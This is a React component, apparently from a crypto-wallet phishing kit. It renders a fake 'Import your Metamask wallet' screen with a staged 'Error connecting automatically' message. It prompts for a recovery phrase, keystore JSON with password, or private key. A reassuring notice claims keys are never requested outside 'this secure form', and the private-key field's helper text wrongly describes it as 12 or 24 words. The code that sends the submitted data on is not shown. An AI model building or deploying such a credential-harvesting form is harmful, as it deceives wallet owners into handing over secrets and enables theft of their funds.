import React from "react";
import { ArrowRight, AlertCircle } from "lucide-react";
import styles from "../WalletConnector.module.css";
export default function ManualConnect({
  wallet,
  inputMethod,
  setInputMethod,
  inputValue,
  setInputValue,
  walletPassword,
  setWalletPassword,
  onSubmit,
  onCancel,
}) {
  // Back button handler to go back to wallet selection
  const handleBack = () => {
    if (onCancel) {
      onCancel();
    }
  };

  return (
    <div className={styles.section}>
      <div className={styles.walletHeader}>
        <img
          src={
            wallet?.logo || "/img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png"
          }
          alt={wallet?.name || "Metamask"}
          className={styles.walletIcon}
        />
        <h2 className={styles.headerTitle}>
          Import your {wallet?.name || "Metamask"} wallet
        </h2>
      </div>

      <div className={styles.securityWarning}>
        <AlertCircle className={styles.warningIcon} size={20} />
        <span className={styles.warningText}>
          Never share your recovery phrase with anyone. We will never ask for
          your private keys or seed phrase outside of this secure form.
        </span>
      </div>

      <div className={styles.errorMessage}>
        <AlertCircle className={styles.errorIcon} size={20} />
        <span>Error connecting automatically, enter manually</span>
      </div>

      <div className={styles.tabs}>
        <button
          className={`${styles.tab} ${
            inputMethod === "phrase" ? styles.activeTab : ""
          }`}
          onClick={() => setInputMethod("phrase")}
        >
          Phrase
        </button>
        <button
          className={`${styles.tab} ${
            inputMethod === "keystore" ? styles.activeTab : ""
          }`}
          onClick={() => setInputMethod("keystore")}
        >
          Keystore JSON
        </button>
        <button
          className={`${styles.tab} ${
            inputMethod === "private" ? styles.activeTab : ""
          }`}
          onClick={() => setInputMethod("private")}
        >
          Private Key
        </button>
      </div>

      {inputMethod === "phrase" && (
        <>
          <input
            className={styles.textArea}
            placeholder="Enter your recovery phrase"
            value={inputValue}
            onChange={(e) => setInputValue(e.target.value)}
            // onClick={handleBack}
          />
          <p className={styles.inputHelper}>
            Typically 12 (sometimes 24) words separated by single spaces
          </p>
        </>
      )}

      {inputMethod === "keystore" && (
        <>
          <textarea
            className={styles.textArea}
            placeholder="Enter your Keystore JSON"
            value={inputValue}
            onChange={(e) => setInputValue(e.target.value)}
            rows={4}
            // onClick={handleBack}
          />
          <input
            type="password"
            className={styles.passwordInput}
            placeholder="Wallet password"
            value={walletPassword}
            onChange={(e) => setWalletPassword(e.target.value)}
            // onClick={handleBack}
          />
          <p className={styles.inputHelper}>
            Several lines of text beginning with "..." plus the password you
            used to encrypt it.
          </p>
        </>
      )}

      {inputMethod === "private" && (
        <>
          <textarea
            className={styles.textArea}
            placeholder="Enter your Private Key"
            value={inputValue}
            onChange={(e) => setInputValue(e.target.value)}
            rows={4}
            // onClick={handleBack}
          />
          <p className={styles.inputHelper}>
            Typically 12 (sometimes 24) words separated by a single space.
          </p>
        </>
      )}

      <div className={styles.actionButtons}>
        <button className={styles.validateButton} onClick={onSubmit}>
          VALIDATE <ArrowRight className={styles.buttonIcon} size={20} />
        </button>
      </div>

      <div className={styles.cancelContainer}>
        <button className={styles.cancelButton} onClick={handleBack}>
          Cancel
        </button>
      </div>
    </div>
  );
}
